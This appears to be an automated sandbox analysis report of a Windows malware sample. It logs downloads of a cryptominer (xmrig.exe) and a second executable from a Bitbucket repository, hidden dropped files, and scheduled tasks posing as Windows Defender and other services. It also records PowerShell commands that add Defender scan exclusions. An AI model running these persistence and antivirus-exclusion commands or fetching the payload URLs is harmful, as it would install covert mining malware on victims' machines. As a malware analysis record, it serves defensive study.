suspicious_features	GET method with no useragent header	suspicious_request	GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP45LSYXJ&Signature=bf%2BxxfvszXPMP7jtjGo74tezGNE%3D&x-amz-security-token=FwoGZXIvYXdzECIaDJgrOS6fkzSPFivs3CK%2BAcHuj52wVNnm4rSADUNCVc5KNhqiufxNy0GncP553pr2hq7mOa8QzZLZfX7%2FNjBaQFglHP7ckxSnsLkrvLRTHFl1dVlHEcN7smhQI0KxwMpNADfae%2FaN%2FXh8bG0DnFsMySkIKQY64NOruebcwBIi83SllxN5d%2Bg6Gbm8AuLRXYcLy4Anflnyt7EzTrcJuG0a5CVCYynwqm82oyPhzx%2B0EdIebw8NtM9EOGQJOS8sWpEz5hgOXWMX9%2BpnTNnbThsosLevoQYyLbYMIdEs21wl%2BhVx%2BL5t0%2B2dBfxZ6FsudMgM3WnALV9R44nUr4Ir348oXZuTrg%3D%3D&Expires=1680597688
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNLA7LD4BL&Signature=g4wJ2r5h59KSahB1y4%2F8HZRLC04%3D&x-amz-security-token=FwoGZXIvYXdzECIaDBCNQm7tYWerDBrTpyK%2BAaQp%2BdNp0ydv0AG2E4AzCKx2u%2FycIejgNxF%2FuFdAIsQHNFVyhHJ4I53ZPUtoxrTWfBbx0FoMNIEAID8XfJeZjrLs%2F1M%2FT9JGTqmtNyHXC6fIXR09xBIIdB3cPxiT7EG6GW3JgLotvx%2BYGLX6CFJhPtpimlM%2F0phB45lz3WckErYh643krmXem4wwpWSzO%2FrkIzT6SJMTQojsT7g0uGUR3FAhsVewpsXzyUQsz%2BzXCv2%2F572gwwPwAnK6rE7AIgUov7evoQYyLYHe7Tu%2FESyH%2FhbUkoPA%2B7rrGq9zuCsGanjOllD7mJgQnDWKxqZ3OhiGO8W3zQ%3D%3D&Expires=1680597703

Performs some HTTP requests (4 events)

request	GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe
request	GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP45LSYXJ&Signature=bf%2BxxfvszXPMP7jtjGo74tezGNE%3D&x-amz-security-token=FwoGZXIvYXdzECIaDJgrOS6fkzSPFivs3CK%2BAcHuj52wVNnm4rSADUNCVc5KNhqiufxNy0GncP553pr2hq7mOa8QzZLZfX7%2FNjBaQFglHP7ckxSnsLkrvLRTHFl1dVlHEcN7smhQI0KxwMpNADfae%2FaN%2FXh8bG0DnFsMySkIKQY64NOruebcwBIi83SllxN5d%2Bg6Gbm8AuLRXYcLy4Anflnyt7EzTrcJuG0a5CVCYynwqm82oyPhzx%2B0EdIebw8NtM9EOGQJOS8sWpEz5hgOXWMX9%2BpnTNnbThsosLevoQYyLbYMIdEs21wl%2BhVx%2BL5t0%2B2dBfxZ6FsudMgM3WnALV9R44nUr4Ir348oXZuTrg%3D%3D&Expires=1680597688
request	GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe
request	GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNLA7LD4BL&Signature=g4wJ2r5h59KSahB1y4%2F8HZRLC04%3D&x-amz-security-token=FwoGZXIvYXdzECIaDBCNQm7tYWerDBrTpyK%2BAaQp%2BdNp0ydv0AG2E4AzCKx2u%2FycIejgNxF%2FuFdAIsQHNFVyhHJ4I53ZPUtoxrTWfBbx0FoMNIEAID8XfJeZjrLs%2F1M%2FT9JGTqmtNyHXC6fIXR09xBIIdB3cPxiT7EG6GW3JgLotvx%2BYGLX6CFJhPtpimlM%2F0phB45lz3WckErYh643krmXem4wwpWSzO%2FrkIzT6SJMTQojsT7g0uGUR3FAhsVewpsXzyUQsz%2BzXCv2%2F572gwwPwAnK6rE7AIgUov7evoQYyLYHe7Tu%2FESyH%2FhbUkoPA%2B7rrGq9zuCsGanjOllD7mJgQnDWKxqZ3OhiGO8W3zQ%3D%3D&Expires=1680597703

Allocates read-write-execute memory (usually to unpack itself) (50 out of 473 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ed21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ed22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:14 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\Dllhost\winlogson.exe
file	C:\ProgramData\Dllhost\dllhost.exe

Creates hidden or system file (12 events)

Time & API	Arguments	Status	Return
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\ filepath: C:\ProgramData\SystemFiles\	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\sys_rh.bin filepath: C:\ProgramData\SystemFiles\sys_rh.bin	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\sys_rh.bin filepath: C:\ProgramData\sys_rh.bin	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roamingsys_rh.bin filepath: C:\Users\test22\AppData\Roamingsys_rh.bin	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\sys_rh.bin filepath: C:\Users\test22\AppData\Local\Temp\sys_rh.bin	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\dllhost.exe filepath: C:\ProgramData\Dllhost\dllhost.exe	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\config.json filepath: C:\ProgramData\SystemFiles\config.json	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1
SetFileAttributesW April 4, 2023, 5:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\winlogson.exe filepath: C:\ProgramData\Dllhost\winlogson.exe	1	1
SetFileAttributesW April 4, 2023, 5:15 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\SystemFiles\config.json filepath: C:\ProgramData\SystemFiles\config.json	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (28 events)

cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Drops a binary and executes it (1 event)

file	C:\ProgramData\Dllhost\winlogson.exe

A process created a hidden window (16 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2788 thread_handle: 0x000003b0 process_identifier: 2784 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a4	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2172 thread_handle: 0x000013c0 process_identifier: 148 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00001798	1	1
CreateProcessInternalW April 4, 2023, 5:14 p.m.	thread_identifier: 2252 thread_handle: 0x0000025c process_identifier: 2208 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000280	1	1
